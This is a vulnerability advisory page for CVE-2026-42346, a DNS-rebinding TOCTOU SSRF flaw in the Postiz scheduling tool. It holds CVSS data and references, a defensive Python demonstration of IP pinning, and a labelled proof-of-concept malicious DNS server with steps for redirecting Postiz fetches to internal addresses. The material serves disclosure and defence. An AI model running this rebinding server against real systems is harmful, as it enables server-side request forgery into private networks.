Security Vulnerability Report
CVE-2026-42346 CVSS 6.5 MEDIUM

CVE-2026-42346

Published: 2026-05-08 23:16:38
Last Modified: 2026-05-08 23:16:38

Description

Postiz is an AI social media scheduling tool. From version 2.16.6 to before version 2.21.7, all SSRF protections added in v2.21.4–v2.21.6 share a fundamental TOCTOU (Time-of-Check-Time-of-Use) vulnerability: isSafePublicHttpsUrl() resolves DNS to validate the target IP, but subsequent fetch() calls resolve DNS independently. An attacker controlling a DNS server can exploit this gap via DNS rebinding to redirect requests to internal network addresses. This issue has been patched in version 2.21.7.
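The two request shapes the description contrasts, as an added example that is not Postiz code: a guard that resolves and validates the hostname but lets the HTTP client resolve again, beside a fetch that resolves once and pins the TCP connection to the validated address while keeping the hostname for SNI and the Host header. The `RebindingResolver` stand-in, the `rebind.example.test` hostname and all function names are constructed for the demonstration.

```python
import http.client
import ipaddress
import socket
import ssl
from urllib.parse import urlsplit

def is_public_ip(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)  # loopback, RFC 1918, link-local etc. are non-global
    return addr.is_global and not addr.is_multicast

def resolve(host: str, resolver=socket.getaddrinfo) -> str:
    # First answer only; 'resolver' is injectable so the race can be shown offline.
    return resolver(host, 443, proto=socket.IPPROTO_TCP)[0][4][0]

def pinned_target(url: str, resolver=socket.getaddrinfo):
    # The fix: resolve exactly once, validate that answer, and connect to it.
    parts = urlsplit(url)
    if parts.scheme != "https" or not parts.hostname:
        raise ValueError("only https URLs with a hostname are allowed")
    ip = resolve(parts.hostname, resolver)
    if not is_public_ip(ip):
        raise ValueError(f"{parts.hostname} resolves to non-public address {ip}")
    return ip, parts.hostname, parts.port or 443, parts.path or "/"

def pinned_https_get(url: str, resolver=socket.getaddrinfo) -> bytes:
    # TCP goes to the validated IP; the hostname is used only for SNI and Host.
    ip, host, port, path = pinned_target(url, resolver)
    raw = socket.create_connection((ip, port), timeout=10)
    tls = ssl.create_default_context().wrap_socket(raw, server_hostname=host)
    conn = http.client.HTTPSConnection(host, port)
    conn.sock = tls  # hand over the pinned socket so the client never resolves itself
    conn.request("GET", path)
    return conn.getresponse().read()  # redirects are not followed: re-check each Location

class RebindingResolver:
    # Constructed stand-in for an attacker-controlled DNS server: public, then internal.
    def __init__(self, first: str, then: str):
        self.answers, self.calls = (first, then), 0
    def __call__(self, host, port, **kw):
        ip = self.answers[min(self.calls, 1)]
        self.calls += 1
        return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", (ip, port))]

def demo(url="https://rebind.example.test/hook"):  # constructed hostname
    host, dns = urlsplit(url).hostname, RebindingResolver("1.1.1.1", "127.0.0.1")
    # Vulnerable shape: the check resolves and validates, the fetch resolves again.
    passed, used = is_public_ip(resolve(host, dns)), resolve(host, dns)
    dns = RebindingResolver("1.1.1.1", "127.0.0.1")
    return passed, used, pinned_target(url, dns)[0], dns.calls
```

`demo()` returns `(True, "127.0.0.1", "1.1.1.1", 1)`: the naive check passes and the naive fetch lands on loopback, while the pinned path resolves a single time and connects to the address it validated.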

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Postiz >= 2.16.6, < 2.21.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# PoC: DNS Rebinding Server for CVE-2026-42346
# This script simulates a malicious DNS server to exploit the TOCTOU race condition.
from dnslib import DNSRecord, DNSHeader, RR, A, QTYPE
import socket


class DNSRebindServer:
    def __init__(self, safe_ip, internal_ip):
        self.safe_ip = safe_ip
        self.internal_ip = internal_ip
        self.query_count = {}

    def handle(self, data):
        request = DNSRecord.parse(data)
        qname = str(request.q.qname)
        qtype = request.q.qtype
        if qname not in self.query_count:
            self.query_count[qname] = 0
        reply = DNSRecord(DNSHeader(id=request.header.id, qr=1, aa=1, ra=1), q=request.q)
        if qtype == QTYPE.A:
            # First query returns Safe IP to bypass isSafePublicHttpsUrl()
            # Subsequent queries return Internal IP for fetch()
            if self.query_count[qname] == 0:
                ip = self.safe_ip
            else:
                ip = self.internal_ip
            self.query_count[qname] += 1
            reply.add_answer(RR(qname, QTYPE.A, rdata=A(ip), ttl=0))
        return reply.pack()


# Exploit Logic:
# 1. Attacker runs this DNS server.
# 2. Attacker sends URL http://attacker-controlled-domain.com to Postiz.
# 3. Postiz calls isSafePublicHttpsUrl() -> DNS returns 1.1.1.1 (Safe) -> Check passes.
# 4. Postiz calls fetch() -> DNS returns 127.0.0.1 (Internal) -> SSRF occurs.
```

References

https://github.com/gitroomhq/postiz-app/commit/071143dcb01cdeb9d5d7019892f4c6ff7b19dbeb
https://github.com/gitroomhq/postiz-app/releases/tag/v2.21.7
https://github.com/gitroomhq/postiz-app/security/advisories/GHSA-f7jj-p389-4w45

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-42346",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-08T23:16:37.903",
    "lastModified": "2026-05-08T23:16:37.903",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Postiz is an AI social media scheduling tool. From version 2.16.6 to before version 2.21.7, all SSRF protections added in v2.21.4–v2.21.6 share a fundamental TOCTOU (Time-of-Check-Time-of-Use) vulnerability: isSafePublicHttpsUrl() resolves DNS to validate the target IP, but subsequent fetch() calls resolve DNS independently. An attacker controlling a DNS server can exploit this gap via DNS rebinding to redirect requests to internal network addresses. This issue has been patched in version 2.21.7."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:L/A:N",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "HIGH",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.2,
          "impactScore": 4.2
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [{"lang": "en", "value": "CWE-918"}]
      }
    ],
    "references": [
      {"url": "https://github.com/gitroomhq/postiz-app/commit/071143dcb01cdeb9d5d7019892f4c6ff7b19dbeb", "source": "[email protected]"},
      {"url": "https://github.com/gitroomhq/postiz-app/releases/tag/v2.21.7", "source": "[email protected]"},
      {"url": "https://github.com/gitroomhq/postiz-app/security/advisories/GHSA-f7jj-p389-4w45", "source": "[email protected]"}
    ]
  }
}
```